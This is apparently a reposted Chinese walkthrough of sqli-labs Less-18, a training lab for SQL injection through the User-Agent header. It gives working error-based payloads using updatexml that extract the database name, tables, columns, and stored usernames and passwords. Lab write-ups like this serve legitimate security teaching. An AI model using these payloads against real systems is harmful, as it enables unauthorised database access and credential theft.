sqli-labs-less-18 http头user agent+报错注入

程序员大本营 2021-09-15 05:01:50
http user labs sqli sqli-labs-less-18


Less-18

首先利用burp suite抓包分析:
在这里插入图片描述
在这里插入图片描述

Username和password验证正确时,返回ip地址和user agent信息
验证错误时,只返回ip地址

所以该关卡是user agent的hppt头注入,
我们可以构造playload更改数据包

更改user agent:

在这里插入图片描述

UA作为数据包中的信息,最后又返回出来,说明后台可能使用了insert into函数将UA插入到数据库,然后再进行输出,
Insert into table value(v01,v02,)

首先判断UA是否存在注入

可以通过更改UA信息:
将UA更改为’,显示UA,并且返回了错误信息,通过错误信息我们可以看到,返回了ip和id名,因此猜测UA信息传入后台数据库可能的insert into语句是:insert into table value(‘UA’,‘ip’,‘id’);
在这里插入图片描述

因为返回的错误中ip和id的闭合方式为‘’,因此我们猜测UA的闭合方式也是‘’,接下来验证猜想:
构造UA为1’,1,1)#
在这里插入图片描述

可以看到验证成功,并没有报错,这样我们可以修改第UA位置的语句,将我们需要获取的信息通过sql语句带入数据库中,再通过报错信息带出:

获取当前数据库名:

’ or updatexml(1,concat(0x7e,(database())),1),1,1)#
在这里插入图片描述
在这里插入图片描述

获取数据库中的表:

’ or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)),1),1,1)#
在这里插入图片描述

’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)),1),1,1)#
在这里插入图片描述

获取users表中的字段:

’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)),1),1,1)#
在这里插入图片描述

获取username的数据:

’ or updatexml(1,concat(0x7e,(select group_concat(username) from security.users)),1),1,1)#
在这里插入图片描述

获取password字段的数据:

’ or updatexml(1,concat(0x7e,(select group_concat(password) from security.users)),1),1,1)#
在这里插入图片描述

版权声明
本文为[程序员大本营]所创,转载请带上原文链接,感谢
https://www.pianshen.com/article/12012093596/

  1. The new front-end lady asked: there was a 404 problem refreshing the page in Vue routing history mode
  2. A Simple Css Meun
  3. Vue modifier dynamiquement le style de l'élément externe du composant
  4. Vue V - si problème non valable
  5. N'osez pas vous opposer à l'intervieweur et obtenir des commentaires personnels des stagiaires d'offer Ali après cinq rondes d'entrevue.
  6. Améliorer continuellement leur capacité à créer des primes, et les questions d'entrevue Java d'Alibaba Huawei Tencent et d'autres grandes usines sont sautées en octets.
  7. The new front-end lady asked: there was a 404 problem refreshing the page in Vue routing history mode
  8. vue v-if未生效問題
  9. Je ne comprends pas comment la machine virtuelle JVM peut encore interviewer, et j'ai terminé ce dictionnaire d'entrevue Java de 1307 pages.
  10. Dongxh, mid autumn festival gifts 🥮, [CSS starry sky realization, Mid Autumn Festival poem]
  11. What if you want to see the moon and don't want to go out
  12. Mid Autumn Festival, Chang'e looks at the moon
  13. Mid Autumn Festival special! Use the simplest animation animation to make the most local and trendy holiday blessing greeting card. This romantic male and female tears of Xiao Chen.
  14. [Pixi] super beautiful! How to make mid autumn festival scene level animation!!
  15. Echarts realizes the rotation of the moon (super simple, you can see it at a glance)
  16. Dart mixin full resolution
  17. Some suggestions on Vue code readability | comments are rewarded
  18. 120 lines of code to achieve pure web video editing
  19. Yang yangsun took a selfie to celebrate his 30th birthday, and Wang Yanlin sent blessings.
  20. Comment passer une entrevue avec une entreprise Internet de première ligne, Android Classic Getting started tutoriel
  21. Comment essayer un développeur Android vraiment niveau, 【 résumé de l'entrevue 】
  22. Wang Ou went back to the hotel with the man at night. It was suspected that his relationship was open. The netizen replied mercilessly: is the man single
  23. 借助HTML ping属性实现数据上报
  24. APNG在线制作、兼容、播放和暂停
  25. Apng production, compatibilité, lecture et pause en ligne
  26. Mise en œuvre de l'escalade des données avec l'attribut de Ping HTML
  27. Comment envoyer 100 000 requêtes http le plus rapidement possible
  28. JQuery Basics
  29. Front and back end data interaction (V) -- what is Axios?
  30. Serverless is a model architecture invented driven by economic benefits- Grady
  31. Les questions d'entrevue pour les ingénieurs Java d'Internet, les intervieweurs rencontrés sont tous de niveau architecte,
  32. Cinq ans d'entrevue d'expérience en développement Java, découvrez les questions que vous devez poser lors de l'entrevue d'embauche du printemps Java de cette année.
  33. La dernière collection de questions d'entrevue Java haute fréquence organisée cette année, 2021 Java Universal Popular Framework
  34. Intel selected Weilai es8 to promote driverless taxis in Europe
  35. JavaScript operator (1), Web Development Engineer
  36. Trier les questions d'entrevue Javascript, trier les points de connaissance des itinéraires d'apprentissage
  37. Song Mengjun's "sleepless night" triggered an upsurge of dance storm after 00
  38. Module management of "free and open source" front-end spa project crudapi background management system based on Vue and Quasar (14)
  39. Encapsulated PHP sends HTTP requests with curl. Get and post are very easy to use
  40. Front and back end data interaction (V) -- what is Axios?
  41. Flutter: résoudre le futur blocage en utilisant Isolate
  42. Résumé des opérations courantes pour les données de structure de l'arbre frontal
  43. Ant Design Transfer Twin Tree Shuttle box "make Wheels"
  44. De la carte de pensée à la base et à l'approfondissement, prenez note de l'expérience d'entrevue d'un octet sautant le poste de recherche et développement Java.
  45. Apprenez les composants d'implémentation de vue et Publiez - les à NPM
  46. [Questions d'entrevue à haute fréquence] À vous de choisir
  47. Une faible connaissance de beginpath () provoque une superposition de style lors de la peinture d'un dessin en toile
  48. React Hooks, laisse - moi t'emmener étudier.
  49. Comment la copie profonde résout - elle les références circulaires?
  50. JavaScript Advanced Programming (3rd Edition) Reading note 6
  51. Analyse de l'URL
  52. Discussion préliminaire sur xss
  53. Solution: développement de la page Web Wechat, obtenir la fosse Piétinée par le flux d'entrée de la caméra via navigator.mediadevice.getusermedia ()
  54. Des milliers de questions d'entrevue sélectionnées n'ont pas encore ét é effacées.
  55. Les questions d'entrevue de niveau intermédiaire et avancé d'Android au fil des ans sont entièrement incluses, et l'algorithme est distribué microservice
  56. J'ai résumé toutes les questions d'entrevue.
  57. Compréhension de la réactivité des données de vue
  58. Note de service CSS (vi): Flex, page mobile et mise en page réactive
  59. JavaScript Review sketch - 1
  60. Analyse du bootstrap webpack